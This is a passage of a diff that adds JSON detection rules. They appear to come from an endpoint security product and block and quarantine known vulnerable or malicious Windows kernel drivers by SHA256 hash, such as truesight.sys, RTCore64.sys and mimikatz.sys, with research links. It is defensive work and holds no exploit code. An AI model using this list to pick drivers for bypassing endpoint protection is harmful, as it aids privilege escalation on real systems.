+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.480322Z",
+ "creation_date": "2026-03-23T11:45:30.480325Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.480335Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d9cbdfc10ba743d5229f7dbb6507b9864012fb58cb253da92962dc611603a73c",
+ "comment": "Vulnerable Kernel Driver (aka GEDevDrvSYS.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "127bdf0c-4bbe-5652-b13d-43c32ca67872",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.486421Z",
+ "creation_date": "2026-03-23T11:45:31.486424Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.486432Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "67dcba22bf61411cf08b8969af50b289e6b39bc72be07a1d4f2a43b3d0f81f8e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "12868a34-5406-56de-956a-75e25d3dec39",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.820195Z",
+ "creation_date": "2026-03-23T11:45:30.820197Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.820203Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "978a1e937dd4c03eb2f2a55a0ed8b14294c5c175584ebf85bd20b889bdc9378c",
+ "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "128a4e46-aa09-5aac-b0bd-4205c46a425f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.461041Z",
+ "creation_date": "2026-03-23T11:45:30.461045Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.461054Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "11208bbba148736309a8d2a4ab9ab6b8f22f2297547b100d8bdfd7d413fe98b2",
+ "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "12a41168-0462-51a8-9a45-9b83bbc6b4c7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.475027Z",
+ "creation_date": "2026-03-23T11:45:31.475032Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.475042Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bccfd41865d666e484b466d20329f31d9689dfe383de42cf3b8ed0465d24aa04",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "12ab50f9-6593-5e39-ab91-c40e5e43ed93",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.984476Z",
+ "creation_date": "2026-03-23T11:45:29.984478Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.984483Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9f70169f9541c8f5b13d3ec1f3514cc4f2607d572ffb4c7e5a98be0856852dd8",
+ "comment": "Vulnerable Kernel Driver (aka inpoutx64.sys) [https://www.loldrivers.io/drivers/91ff1575-9ff2-46fd-8bfe-0bb3e3457b7f/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "12b4ea0e-3b93-585e-a69f-87dc66b5c24c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.830563Z",
+ "creation_date": "2026-03-23T11:45:30.830565Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.830571Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "342a4f20a79388bf0773e9ff1ce5146dd12d2daa8199ad9b9b7b8f509f4aae19",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "12ba60f2-bcb1-5f7f-81c1-80c615b11322",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.486610Z",
+ "creation_date": "2026-03-23T11:45:31.486613Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.486622Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ee2acea763a02c1ca721a87f3740ae2ba7c442841554f27dd215f66d61545c3f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "12c48090-aa7d-5781-b155-485c1e672cec",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.144682Z",
+ "creation_date": "2026-03-23T11:45:31.144685Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.144690Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "74acdbb7bd8674e46a3e72fc6bd5e069e7268707860a2593a969f0fce78bb056",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "12e32e43-ca65-5ea8-a8f2-f57f007371ba",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.819372Z",
+ "creation_date": "2026-03-23T11:45:31.819374Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.819379Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7820102b73f0b6adbed965be95c2880788c0bc84bfa743c50dcf48164616ae42",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "12eadc57-9c8f-5f83-a8f1-7b831ff796bb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.492073Z",
+ "creation_date": "2026-03-23T11:45:31.492075Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.492080Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7553c03169bb960696f1eb35db43c41a3a821c5eb05911642c95457f8c7e871f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "12f5ee20-d86d-5d1b-8324-332be0951370",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.820772Z",
+ "creation_date": "2026-03-23T11:45:30.820774Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.820780Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a97b404aae301048e0600693457c3320d33f395e9312938831bc5a0e808f2e67",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "13069652-2d29-58c3-a9fe-3cef038e622d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.149424Z",
+ "creation_date": "2026-03-23T11:45:31.149427Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.149436Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4c9bde89e72111cb03fc68dd0a25cb76288bbb951fc2995b8cecc8b8abf6dec5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "130f1259-890b-575c-af2c-86de58df83e2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.980012Z",
+ "creation_date": "2026-03-23T11:45:29.980014Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.980019Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2dec76da0b361e4ed49a4015e67cefb0e6b812103d8ebf93b74016d99d9fcfad",
+ "comment": "Vulnerable Kernel Driver (aka Monitor_win10_x64.sys) [https://www.loldrivers.io/drivers/ca415ed5-b611-4840-bfb2-6e1eacac33d1/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1319bb43-9c2e-5ace-b293-cd20038a552e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.459186Z",
+ "creation_date": "2026-03-23T11:45:30.459189Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.459198Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "12656fc113b178fa3e6bfffc6473897766c44120082483eb8059ebff29b5d2df",
+ "comment": "Vulnerable Kernel Driver (aka netfilter2.sys) [https://www.loldrivers.io/drivers/5ad8a3b6-6d20-4c95-8fa7-9a507167ba3c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "131ee303-f4c6-59e6-ad33-9d39ed4158ce",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.821556Z",
+ "creation_date": "2026-03-23T11:45:30.821559Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.821567Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "26ecd3cea139218120a9f168c8c0c3b856e0dd8fb2205c2a4bcb398f5f35d8dd",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "13311cd5-daed-5c3b-8f3f-5b18cdf66655",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.830113Z",
+ "creation_date": "2026-03-23T11:45:30.830115Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.830121Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "989b20aaaedb1724948b96d3873d86fae7889c3f3342a4bc87fe5dbd2a66ca4b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "133bb6d1-3a8b-59cf-9eaa-fac7e746bf47",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.154449Z",
+ "creation_date": "2026-03-23T11:45:31.154451Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.154456Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e2ab7d04d40166f22ba4557f119c92caeb43b6d6bdeba179f040cc85b7dcaeae",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "13514800-d2bf-5aac-bcd4-e970bce409ee",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.462342Z",
+ "creation_date": "2026-03-23T11:45:30.462346Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.462354Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8210a89ba143d927384d7b2e6b3714d6ae9a9a384796ec6e306df38ca91e9c4e",
+ "comment": "Malicious Kernel Driver (aka mimikatz.sys) [https://www.loldrivers.io/drivers/14556074-b235-4378-b356-f58721629d72/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "136455b6-2ecf-57aa-855a-f81b9ab24af2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.979064Z",
+ "creation_date": "2026-03-23T11:45:29.979066Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.979072Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e75714f8e0ff45605f6fc7689a1a89c7dcd34aab66c6131c63fefaca584539cf",
+ "comment": "Vulnerable Kernel Driver (aka LHA.sys) [https://www.loldrivers.io/drivers/eb07ef7e-0402-48eb-8e06-8fb76eda5b84/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "13691976-af84-53f9-95e9-bb2b56d9702d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.819226Z",
+ "creation_date": "2026-03-23T11:45:31.819229Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.819234Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "037feddbfda7bd71bd251f82cacac9ddbc7e11bc6d0c27a32d439b86c27907e8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "136a498b-416e-549e-ab18-a8d88dd0fdee",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.825614Z",
+ "creation_date": "2026-03-23T11:45:30.825617Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.825622Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "42a8d5d800c2f86648c2b852205354599ee5b3702fb58b5b86b6caa513690330",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "136d9937-07de-52eb-970a-4b8d627ef6d8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.458550Z",
+ "creation_date": "2026-03-23T11:45:30.458553Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.458562Z",
+ "rule_level": null,
+ "rule_level_override": null,
